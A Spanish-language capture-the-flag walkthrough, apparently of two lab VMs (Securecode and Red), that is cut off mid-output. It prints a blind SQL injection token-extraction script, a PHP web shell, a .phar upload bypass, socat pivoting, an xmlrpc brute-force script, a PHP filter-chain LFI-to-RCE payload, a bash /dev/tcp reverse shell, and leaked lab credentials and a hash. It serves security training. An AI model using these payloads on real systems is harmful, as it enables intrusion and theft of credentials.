Podemos enumerar el token y enviarlo para cambiar la contraseña del usuario admin.

Debido a que conocemos que el token puede ser mayúsculas y minúsculas y números. Hay que volver a modificar el script.

#!/usr/bin/python3

from pwn import *

import requests, signal, sys, string


def def_handler(sig, frame):
    print("\n\n[!] Saliendo ...\n")
    sys.exit(1)

# Ctrl+c

signal.signal(signal.SIGINT, def_handler)

# Var globales

proxies = {
        'http': f'socks5://127.0.0.1:1080'
}
main_url = "http://192.168.100.20/item/viewItem.php"

characters = string.ascii_letters + string.digits

def makeSqli():

    p1 = log.progress("Fuerza Bruta")
    p1.status("Iniciando ataque de fuerza bruta")

    time.sleep(2)

    p2 = log.progress("token")

    token =  ""

    for position in range(1,50):
        for character in characters:

            sqliURL = main_url + "?id=5 or (select(select ascii(substring(token,%d,1)) from user where id_level = 1)=%d);" % (position, ord(character))

            r = requests.get(sqliURL, proxies=proxies)

            if r.status_code == 404:
                token += character
                p2.status(token)
                break

if __name__ == '__main__':

    makeSqli()

python3 exploit.py
[......\.] Fuerza Bruta: Iniciando ataque de fuerza bruta
[▇] token: P2rmqwDPXxpwNxC
^C

[!] Saliendo ...

Y ahí tenemos el token del usuario admin; vamos a ver si le podemos cambiar la contraseña.

Y podemos cambiar la contraseña a admin, por tanto, vamos a ponerle cualquiera, por ejemplo, test.

Vamos a probar si nos podemos logear en la página web.

Y logramos conectarnos a la página web como el usuario admin.

Mirando a lo que tenemos acceso, me encuentro lo siguiente.

En Items vemos que podemos editar ciertos objetos que vemos en la web si le damos a editar o agregar un nuevo item; vamos a intentar agregar un nuevo item.

Vemos que nos deja elegir una imagen para el ítem; esto puede ser peligroso debido a que no se está validando correctamente qué archivos se suben a la máquina. Podríamos subir un .php malicioso para ganar acceso a la máquina.

<?php
    echo "<pre>" . shell_exec($_GET['cmd']) . "</pre>";
?>

Voy a guardarlo como cmd.php e intentarlo subir.

Pero vemos que no nos deja, debido a que tenemos la estructura del código web. Podemos ver qué validaciones se están aplicando.

cat newItem.php

<?php 

include "../include/header.php";
include "../include/isAuthenticated.php";

$id_user = mysqli_real_escape_string($conn, $_POST['id_user']);
$name = mysqli_real_escape_string($conn, $_POST['name']);
$imgname = mysqli_real_escape_string($conn, $_FILES['image']['name']);
$description = mysqli_real_escape_string($conn, $_POST['description']);
$price = mysqli_real_escape_string($conn, $_POST['price']);

$blacklisted_exts = array("php", "phtml", "shtml", "cgi", "pl", "php3", "php4", "php5", "php6");
$mimes = array("image/jpeg", "image/png", "image/gif");

Vemos que valida ciertas extensiones, pero hay varias que interpretan código .php y no están contempladas, como el .phar; por tanto, le cambiamos el nombre del archivo a cmd.phar y probamos.

Probando, no me deja agregar el nuevo ítem, pero sí modificar uno existente. Que a fines prácticos es lo mismo.

Por tanto, si hacemos clic derecho y lo abrimos en otra pestaña para ver la ubicación y utilizamos la web ?cmd=<command> nos lo ejecuta.

Por tanto, tenemos ejecución de comandos; ahora podemos enviarnos una consola a nuestra máquina. Pero debido a que no tenemos acceso directamente, tenemos que hacer unos pasos extra.

Primero que nada vamos a necesitar usar → socat.

Socat es una herramienta que nos permite redirigir todo el tráfico que va hacia un puerto a otra IP en un puerto, entre otras cosas.

Entonces nosotros, desde el cmd.php, vamos a enviar una reverse shell a la máquina crossroads, donde vamos a tener el socat redirigiendo el tráfico hacia nuestra IP a un puerto.

Primero vamos a subir el binario socat a la máquina crossroads.

python3 -m http.server 80                                 
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

root@crossroads:/root# wget http://192.168.0.6/socatx64.bin
root@crossroads:/root# chmod +x socatx64.bin

root@crossroads:/root# ./socatx64.bin TCP4-LISTEN:4446,fork TCP4:192.168.0.6:4446

En este comando, estamos redirigiendo el tráfico entrante en la máquina Crossroads hacia nuestra IP por el puerto 4446; por tanto, ahora la reverse shell la tenemos que enviar a Crossroads y ponernos en escucha con nc en nuestra máquina atacante por el puerto 4446 en este caso.

pwncat-cs :4446

Recuerden que tenemos que pasar por el proxy (en este caso con FoxyProxy) y tenemos que utilizar la IP a la que la máquina tiene acceso, en este caso la 192.168.100.x, y urlencodear los & a %26 para que funcione.

pwncat-cs :4446          
[11:39:44] Welcome to pwncat 🐈!                                                                       __main__.py:164
[11:42:43] received connection from 192.168.0.26:38706                                                      bind.py:84
[11:42:43] 192.168.0.26:38706: registered new host w/ db
(remote) www-data@secure:/var/www/html/item/image$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:87:c3:59 brd ff:ff:ff:ff:ff:ff
    inet 192.168.100.20/24 brd 192.168.100.255 scope global noprefixroute enp0s3
       valid_lft forever preferred_lft forever
    inet6 fe80::a00:27ff:fe87:c359/64 scope link 
       valid_lft forever preferred_lft forever
3: enp0s8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:03:9e:5b brd ff:ff:ff:ff:ff:ff
    inet 192.168.200.10/24 brd 192.168.200.255 scope global noprefixroute enp0s8
       valid_lft forever preferred_lft forever
    inet6 fe80::a00:27ff:fe03:9e5b/64 scope link 
       valid_lft forever preferred_lft forever

Como ven, el túnel con socat funcionó, y estamos en la máquina Securecode como www-data.

Esta máquina no tiene contemplado que escalemos privilegios, por tanto, hasta aquí llega el laboratorio.

Comentarios - Securecode

La verdad, siempre que me quedo atorado es porque no sé enumerar bien y esta máquina lo demuestra. Probé varias cosas, pero se me olvidó mirar las extensiones comunes como .bak o .zip y, luego de tener el código de cómo funciona la web, fue más sencillo. Para practicar SQLI, una máquina bastante buena, la verdad.

Conclusiones

Laboratorio algo extenso y solo son dos máquinas, pero lo importante es aprender temas de pivoting y cómo manejar estas herramientas para poder moverse entre interfaces de redes y máquinas donde primeramente no tenemos acceso.

Ya sabéis que cualquier cosa, me pueden dejar un comentario o contactarme por Discord como Varovish.

Skills

- Virtual Hosting
- Fuzzing
- xmlrpc | Wordpress enum
- php filterchaing LFI -> RCE
- mysql enum database
- Lateral movement | Abusing time SUDO
- Abusing cron tab | Privilage escalation

Reconocimiento

Para comenzar, como siempre vamos a crearnos nuestros directorios de trabajo

$ mkdir Red            
$ cd Red 
$ mkdir nmap content exploit
ls
content  exploit  nmap

Luego vamos a proceder a escanear los servicios que se exponen atravez de los puertos de la maquina.

$ sudo nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 192.168.0.9 -oN Allports

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.93 ( https://nmap.org ) at 2025-06-28 09:42 -03
Initiating ARP Ping Scan at 09:42
Scanning 192.168.0.9 [1 port]
Completed ARP Ping Scan at 09:42, 0.12s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 09:42
Scanning 192.168.0.9 [65535 ports]
Discovered open port 22/tcp on 192.168.0.9
Discovered open port 80/tcp on 192.168.0.9
Completed SYN Stealth Scan at 09:42, 6.15s elapsed (65535 total ports)
Nmap scan report for 192.168.0.9
Host is up, received arp-response (0.0054s latency).
Scanned at 2025-06-28 09:42:21 -03 for 6s
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: D8:F3:BC:4D:AC:A3 (Liteon Technology)

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 6.37 seconds
           Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)

Como vemos, el puerto 22 y 80 estan abiertos, los cuales indican ssh y http que seguramente sea una web.

Vamos a utilzar la herramienta whatweb para ver que nos reporta.

$ whatweb 192.168.0.9

whatweb 192.168.0.9 
http://192.168.0.9 [200 OK] Apache[2.4.41], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[192.168.0.9], MetaGenerator[WordPress 5.8.1], PoweredBy[--], Script, Title[Hacked By Red – Your site has been Hacked! You’ll never find the backdoor hahahah], UncommonHeaders[link], WordPress[5.8.1]

Vemos que hay un worpress por detras, y un titulo algo llamativo.

Vamos a hecharle un vistazo a la web para ver como se ve.

Vemos una pagina que parece algo basica, pero si miramos el codigo fuente encontramos lo siguiente.

Encontramos multiples entradas de un dominio, redrocks.win, esto quiere decir, que quizas se este aplicando virtualhosting, para que nuestra maquina resuelva a esta direccion, hay que agregar la IP y el dominio a nuestro “/etc/hosts“.

$ cat /etc/hosts 
127.0.0.1    localhost
::1    localhost ip6-localhost ip6-loopback
fe00::    ip6-localnet
ff00::    ip6-mcastprefix
ff02::1    ip6-allnodes
ff02::2    ip6-allrouters
127.0.0.1    exegol-default
$ echo "192.168.0.9    redrocks.win" >> /etc/hosts            
$ cat /etc/hosts                                  
127.0.0.1    localhost
::1    localhost ip6-localhost ip6-loopback
fe00::    ip6-localnet
ff00::    ip6-mcastprefix
ff02::1    ip6-allnodes
ff02::2    ip6-allrouters
127.0.0.1    exegol-default
192.168.0.9    redrocks.win

Ahora veamos nuevamente la pagina.

Como podemos observar, la pagina ahora si nos carga correctamente.

Vamos a realizar un poco de fuzzing para ver que directorios o archivos interesantes nos encontramos.

$ ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.0.9/FUZZ -t 10

rss                     [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 121ms]
login                   [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 101ms]
feed                    [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 69ms]
0                       [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 158ms]
atom                    [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 112ms]
wp-content              [Status: 301, Size: 315, Words: 20, Lines: 10, Duration: 11ms]
admin                   [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 108ms]
rss2                    [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 127ms]
wp-includes             [Status: 301, Size: 316, Words: 20, Lines: 10, Duration: 4ms]
rdf                     [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 149ms]
page1                   [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 118ms]
'                       [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 105ms]
dashboard               [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 97ms]
%20                     [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 103ms]

Vemos muchos directorios, entre ellos un login y un wp-content, admin.

Vamos a ir revisando para ver que cosas interesantes nos encontramos.

Luego de revisar, nos encontramos que la mayoria nos redirige al login de wp-content y el resto nos descarga una extructura xml que dice lo siguiente

<?xml version="1.0" encoding="UTF-8"?><feed
    xmlns="http://www.w3.org/2005/Atom"
    xmlns:thr="http://purl.org/syndication/thread/1.0"
    xml:lang="en-US"
    xml:base="http://redrocks.win/wp-atom.php"
    >
    <title type="text">Hacked By Red</title>
    <subtitle type="text">Your site has been Hacked! You’ll never find the backdoor hahahah </subtitle>

    <updated>2021-10-31T20:13:59Z</updated>

    <link rel="alternate" type="text/html" href="http://redrocks.win" />
    <id>http://redrocks.win/feed/atom/</id>
    <link rel="self" type="application/atom+xml" href="http://redrocks.win/feed/atom/" />

    <generator uri="https://wordpress.org/" version="5.8.1">WordPress</generator>
    <entry>
        <author>
            <name>administrator</name>
                            <uri>http://10.0.2.20</uri>
                        </author>

        <title type="html"><![CDATA[Hello Blue!]]></title>
        <link rel="alternate" type="text/html" href="http://redrocks.win/2021/10/24/hello-world/" />

        <id>http://10.0.2.20/?p=1</id>
        <updated>2021-10-31T20:13:59Z</updated>
        <published>2021-10-24T14:32:37Z</published>
        <category scheme="http://redrocks.win" term="Uncategorized" />
        <summary type="html"><![CDATA[Red was here, Blue is a loser!]]></summary>

                    <content type="html" xml:base="http://redrocks.win/2021/10/24/hello-world/"><![CDATA[<p>Red was here, Blue is a loser!</p>
<p><!-- Still Looking For It? Maybe you should ask Mr. Miessler for help, not that it matters, you won't be able to read anything with it anyway --></p>
]]></content>

                    <link rel="replies" type="text/html" href="http://redrocks.win/2021/10/24/hello-world/#comments" thr:count="1" />
            <link rel="replies" type="application/atom+xml" href="http://redrocks.win/2021/10/24/hello-world/feed/atom/" thr:count="1" />
            <thr:total>1</thr:total>
            </entry>
    </feed>

Parece que existe un backdoor que podriamos utilizar para ganar acceso.

Luego de mirar un poco me encuentro un hiperviculo en un post de la pagina

La cual lleva a otra IP, sobre /wp-admin.

El cual me redirigue al tipico panel admin de worpress, lo unico que puedo comprobar es que existe el usuario administrator, debido a que devuelve una respuesta direfente.

Luego de seguir investigando me encuentro con lo siguiente.

El xmlrpc.php de los Worpress, esto sirve para enviar peticiones xml, quizas podamos estraer alguna informacion.

Intercepto la peticion con burpsuite y le doy a cambiar tipo de peticion, para tramitarlo por POST.

Enviando lo siguiente

<?xml version="1.0" encoding="utf-8"?>  
<methodCall>  
<methodName>system.listMethods</methodName>  
<params></params>  
</methodCall>

Una estructura basica, que nos permite listar todos los metodos que podemos utilizar.

Podemos intentar realizar fuerza bruta utilizando el metodo wp.getUsersBlogs (Se pueden utilizar otros metodos tambien como wp.getCategories o metaWeblog.getUsersBlogs)

Yo voy a utilizar un script en bash.

#!/usr/bin/bash

function ctrl_c(){
  echo -e "\n\n[!]Saliendo...\n"
  tput cnorm; exit 1
}
tput civis

function createXML(){
  password=$1
  xmlfile="""
<?xml version=\"1.0\" encoding=\"UTF-8\"?>
<methodCall> 
<methodName>wp.getUsersBlogs</methodName> 
<params> 
<param><value>administrator</value></param> 
<param><value>$password</value></param> 
</params> 
</methodCall>
"""

  echo $xmlfile > file.xml

  response=$(curl -s -X POST http://192.168.0.14:/xmlrpc.php -d@file.xml)

  if [ ! "$(echo $response | grep 'Incorrect username or password')" ]; then
    echo -e "\n La password para el usuario administrator es $password"
    tput cnorm
    exit 1
  fi

}

# Ctrl_c
trap ctrl_c SIGINT

cat /usr/share/wordlists/rockyou.txt | while read password; do
  createXML $password
  tput cnorm
done

Probando varios diccionarios, no logro dar con la contraseña del administrador.

Mirando la ruta http://redrocks.win/wp-json/wp/v2/users, podemos observar una lista de usuarios disponibles, donde podemos confirmar que solo existe el user administrator.

Haciendo Fuzzing por extenciones .php veo que obtengo un internal server error

ffuf -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txt -u http://192.168.0.14/FUZZ -t 40 -fl 10

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.0.14/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response lines: 10
________________________________________________

NetworkFileManagerPHP.php [Status: 500, Size: 0, Words: 1, Lines: 1, Duration: 5807ms]

Normalmente los backdoor suelen ser del siguiente estilo: ejemplo.php?var=<comando>, por tanto ahora nos toca buscar esa variable.

Luego de varios intentos, debido a que al usar hilos o enviar multiples peticiones por mucho tiempo la maquina se colgaba, logro descubrir la variable key.

La url quedaria de la siguiente manera http://redrocks.win/NetworkFileManagerPHP.php?key

Intento ejecutar comandos, pero no me deja, hasta que pruebo apuntar un archivo y veo lo siguiente.

Por tanto, parece que tenemos un lfi (Local File Inclusion), vamos a listar.

Para ganar acesso directamente voy a utilizar de php filter chain.

Esta tecnia podria tener su poprio capitulo aparte de explicar como funciona, voy a explicarlo en resumen y si quieren, en un futuro doy una explicacion mas profunda.

Basicamente consiste en abusar en la forma de como se representan los datos en unicode segun que tipo de codificacion se utilize (ejemplo UTF-8, UTF-7, etc.)

Lo interesante aqui es que podemos ir cambiando sobre los tipos de codificacion para ir representando en la web lo que queremos, en este caso yo voy a representar una web shell sencilla de php <? php echo shell_exec($_GET[cmd])"; ?>, donde utilizamos la variable cmd, para ejecutar el comando deado.

Para hallar la sucesion de conversiones que necesito, utilizare el siguiente proyecto → php_filter_chain

El payload quedaria de la siguiente forma:

python3 php_filter_chain_generator.py --chain '<?php echo shell_exec($_GET['cmd']); ?>'
[+] The following gadget chain will generate the following code : <?php echo shell_exec($_GET[cmd]); ?> (base64 value: PD9waHAgZWNobyBzaGVsbF9leGVjKCRfR0VUW2NtZF0pOyA/Pg)
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSA_T500.UTF-32|convert.iconv.CP857.ISO-2022-JP-3|convert.iconv.ISO2022JP2.CP775|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM891.CSUNICODE|convert.iconv.ISO8859-14.ISO6937|convert.iconv.BIG-FIVE.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.864.UTF32|convert.iconv.IBM912.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP949.UTF32BE|convert.iconv.ISO_69372.CSIBM921|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UTF-16|convert.iconv.ISO6937.UTF16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.iconv.CP950.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UTF16.EUC-JP-MS|convert.iconv.ISO-8859-1.ISO_6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-4LE.OSF05010001|convert.iconv.IBM912.UTF-16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp

El cual si pegamos en la web y agregamos &cmd=<comando> al final, nos ejecuta el comando.

En este caso, puse whoami y vemos www-data, por tanto tenemos ejecucion de comandos, vamos a recibir una consola con pwncat.

En lugar de whoami, la siguiente linea bash -c "bash -i >%26 /dev/tcp/192.168.0.8/4443 0>%261".

pwncat-cs :4443
[17:27:33] Welcome to pwncat 🐈!                                                                       __main__.py:164
[17:27:35] received connection from 192.168.0.14:42536                                                      bind.py:84
[17:27:37] 192.168.0.14:42536: registered new host w/ db

Pwncat es una herramienta bastante fuerte, para transferir archivos y moverse entre tu maquina atacante y la victima entre otras cosas.

Escalada de Privilegios.

Ahora toca enumerar el sistema para ver que encontramos.

Revisando la ruta /var/www/wordpress, me ecuentro con el archivo de configuracion.

ls
 %26                license.txt     wp-comments-post.php    wp-includes        wp-settings.php
 %261                readme.html     wp-config-sample.php    wp-links-opml.php   wp-signup.php
'%261'$'\n'            wp-activate.php     wp-config.php        wp-load.php        wp-trackback.php
 NetworkFileManagerPHP.php   wp-admin         wp-content        wp-login.php        xmlrpc.php
 index.php            wp-blog-header.php   wp-cron.php        wp-mail.php

El cual contiene las siguientes credenciales:

<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the installation.
 * You don't have to use the web site, you can copy this file to "wp-config.php"
 * and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://wordpress.org/support/article/editing-wp-config-php/
 *
 * @package WordPress
 */
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );

/** MySQL database username */
define( 'DB_USER', 'john' );

/** MySQL database password */
define( 'DB_PASSWORD', 'R3v_m4lwh3r3_k1nG!!' );

El usuario existe, por tanto voy a intentar conectarme por ssh, para ver si funciona.

Pero no, no funciona, vamos a intentar conectarnos al MYSQL para ver que encontramos

mysql -u john -p 
Enter password: # R3v_m4lwh3r3_k1nG!!
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 4906
Server version: 8.0.26-0ubuntu0.20.04.3 (Ubuntu)

Copyright (c) 2000, 2021, Oracle and/or its affiliates.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>

show databases();
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '()' at line 1
mysql> You will never win Blue

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| wordpress          |
+--------------------+
2 rows in set (0.14 sec)

mysql> use wordpress
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+-----------------------+
| Tables_in_wordpress   |
+-----------------------+
| wp_commentmeta        |
| wp_comments           |
| wp_links              |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_termmeta           |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
+-----------------------+
12 rows in set (0.00 sec)

mysql> select * from wp_users;
+----+---------------+------------------------------------+---------------+---------------+------------------+---------------------+---------------------+-------------+---------------+
| ID | user_login    | user_pass                          | user_nicename | user_email    | user_url         | user_registered     | user_activation_key | user_status | display_name  |
+----+---------------+------------------------------------+---------------+---------------+------------------+---------------------+---------------------+-------------+---------------+
|  1 | administrator | $P$BHts8T4UWtFsg2Od/BqoFMxZoktTsq. | administrator | red@rocks.com | http://10.0.2.20 | 2021-10-24 14:32:37 |                     |           0 | administrator |
